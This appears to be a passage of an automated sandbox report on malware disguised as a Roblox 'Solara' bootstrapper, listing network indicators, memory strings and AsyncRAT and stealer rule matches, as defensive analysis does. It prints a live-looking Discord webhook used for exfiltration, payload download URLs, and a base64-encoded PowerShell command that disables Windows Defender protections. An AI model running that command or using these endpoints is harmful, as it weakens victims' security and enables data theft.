                    Source: Binary string: System.Xml.pdbp+ source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Xml.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.pdb source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96E0C000.00000004.00000800.00020000.00000000.sdmp, WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: mscorlib.pdbh source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Core.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Numerics.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Data.pdbH source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: mscorlib.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Drawing.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Core.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Runtime.Serialization.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Numerics.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 127.0.0.1
                    Source: Malware configuration extractorURLs: 23.ip.gl.ply.gg
                    Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o
                    Source: global trafficTCP traffic: 192.168.2.7:49989 -> 147.185.221.23:26848
                    Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                    Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 128.116.123.3 128.116.123.3
                    Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: ip-api.com
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 104.21.93.27:443
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                    Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: getsolara.dev
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: clientsettings.roblox.com
                    Source: global trafficDNS traffic detected: DNS query: www.nodejs.org
                    Source: global trafficDNS traffic detected: DNS query: 23.ip.gl.ply.gg
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463/rpc?v=1
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:64632
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientsettings.roblox.com
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF3F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsP
                    Source: powershell.exe, 0000001E.00000002.1802454253.000001F4EE624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-term4-fra2.roblox.com
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getsolara.dev
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD7FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gstatic.com
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD846000.00000004.00000800.00020000.00000000.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD85B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                    Source: BootstrapperV1.23.exe.0.drString found in binary or memory: http://james.newtonking.com/projects/json
                    Source: powershell.exe, 00000010.00000002.1342493602.000001E610071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1449851078.0000019F3D1A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1578820555.00000195A422F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000010.00000002.1319923326.000001E600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195943E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD7DE000.00000004.00000800.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2478752394.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1319923326.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195941C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D5FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000010.00000002.1319923326.000001E600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195943E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: Amcache.hve.23.drString found in binary or memory: http://upx.sf.net
                    Source: powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000010.00000002.1355528661.000001E67BB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nodejs.org
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
                    Source: powershell.exe, 00000010.00000002.1319923326.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195941C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D5FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
                    Source: powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                    Source: Injector.exe.0.drString found in binary or memory: https://discord.com/api/v10/users/
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165S
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BCD000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://getsolara.dev/api/endpoint.json
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B43000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://getsolara.dev/asset/discord.json
                    Source: Injector.exe.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                    Source: powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json
                    Source: powershell.exe, 0000001E.00000002.1797731442.000001F4EE532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microso
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD7F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                    Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                    Source: powershell.exe, 0000001C.00000002.1607943237.00000195AC969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5vn
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CA9000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CA5000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                    Source: powershell.exe, 00000010.00000002.1342493602.000001E610071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1449851078.0000019F3D1A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1578820555.00000195A422F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://pastebin.com/raw/pjseRvyK
                    Source: BootstrapperV1.23.exe.0.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
                    Source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                    Source: BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.7:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.7:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.7:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.7:49706 version: TLS 1.2

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 3.0.Windows Security Host.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                    Source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Windows Security Host.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeCode function: 0_2_00007FFAAC5B0A310_2_00007FFAAC5B0A31
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeCode function: 3_2_00007FFAAC5AA4323_2_00007FFAAC5AA432
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeCode function: 3_2_00007FFAAC5A16893_2_00007FFAAC5A1689
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeCode function: 3_2_00007FFAAC5A96863_2_00007FFAAC5A9686
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeCode function: 3_2_00007FFAAC5A16C93_2_00007FFAAC5A16C9
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeCode function: 3_2_00007FFAAC5A7E5D3_2_00007FFAAC5A7E5D
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeCode function: 4_2_00007FFAAC596DB04_2_00007FFAAC596DB0
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeCode function: 4_2_00007FFAAC5A25404_2_00007FFAAC5A2540
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC58211D16_2_00007FFAAC58211D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC6530E916_2_00007FFAAC6530E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFAAC6530E924_2_00007FFAAC6530E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFAAC6530E928_2_00007FFAAC6530E9
                    Source: C:\Users\user\Windows Security Host.exeCode function: 34_2_00007FFAAC59168934_2_00007FFAAC591689
                    Source: C:\Users\user\Windows Security Host.exeCode function: 34_2_00007FFAAC5916C934_2_00007FFAAC5916C9
                    Source: C:\Users\user\Windows Security Host.exeCode function: 35_2_00007FFAAC59168935_2_00007FFAAC591689
                    Source: C:\Users\user\Windows Security Host.exeCode function: 35_2_00007FFAAC5916C935_2_00007FFAAC5916C9
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe 8F2E28588F2303BD8D7A9B0C3FF6A9CB16FA93F8DDC9C5E0666A8C12D6880EE3
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4064 -s 2188
                    Source: 8Hd0ZExgJz.exe, 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs 8Hd0ZExgJz.exe
                    Source: 8Hd0ZExgJz.exe, 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindows Security Host.exe4 vs 8Hd0ZExgJz.exe
                    Source: 8Hd0ZExgJz.exe, 00000000.00000000.1231228845.00000000003DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBootstrapperV1.23.exe4 vs 8Hd0ZExgJz.exe
                    Source: 8Hd0ZExgJz.exeBinary or memory string: OriginalFilenameBootstrapperV1.23.exe4 vs 8Hd0ZExgJz.exe
                    Source: 8Hd0ZExgJz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 3.0.Windows Security Host.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 2.0.Injector.exe.242bb8d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 00000000.00000002.1259484875.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000003.00000000.1257101643.0000000000452000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\Windows Security Host.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                    Source: 8Hd0ZExgJz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Windows Security Host.exe.0.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.0.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.0.dr, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.3.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.3.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Windows Security Host.exe.3.dr, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Injector.exe.0.dr, --.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                    Source: Windows Security Host.exe.0.dr, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csBase64 encoded string: 'wZKGOVj0oK1WmVl4RudElUE2v9D7IqxYxEnmez9YUDoQ7O9LgtvAX5KliA4ipu1WzdmQviKu', 'zU1eOvlqjP1DLBOWCorJACQIjNb8U8kFKhcIqEr93EnP9aklUh6ZSdVb454VfiLkHNMr2uoM'
